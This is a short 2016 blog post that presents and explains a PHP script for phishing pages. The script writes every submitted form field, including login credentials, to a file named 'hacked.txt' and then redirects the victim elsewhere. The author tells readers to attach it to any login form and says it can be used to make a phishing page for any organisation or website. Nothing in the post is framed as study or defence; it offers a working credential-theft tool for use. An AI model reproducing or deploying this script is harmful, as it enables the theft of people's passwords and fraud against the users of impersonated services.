AD (728x90)

Powered by Blogger.

Some Text

Sunday 22 May 2016

PHP Script For Phishing

Share it Please


Phishing is a technique used to steal sensitive and personal information by the medium of a fake webpage that exactly looks like a webpage of a reputed website or financial institution. I have deeply explained about Phishing in my previous post.

Have you ever thought how does the PHP script saves the login credentials to a text file and What is that script?, There is nothing special in this script it is just a simple PHP script that saves the information directly to a text file. This is one of the basic function of PHP that is generally used for gathering information through the medium of a form. The same is happening here, there is a certain action performed on pressing the login button that opens and executes the php script that we are using to save the login information to a text file.

Here I have bring PHP script for you that you can use for with any login page just by putting the php file name in the action attribute of the login button.

<?php
header ('Location:http://www.ayushtyagi.com');
$handle = fopen("hacked.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Using this script you can make phishing page for any organisation and website. Hope you will like it...

Written by

I am Ayush Tyagi, A Blogger who is living a dot com lifestyle by exploring new ways to make money on the internet. I am always enthusiastic to share everything that can help you to make money on the internet and build your own dot com lifestyle.

0 comments:

Post a Comment

COPYRIGHT © 2015-16 Ayush Tyagi. All rights resevered.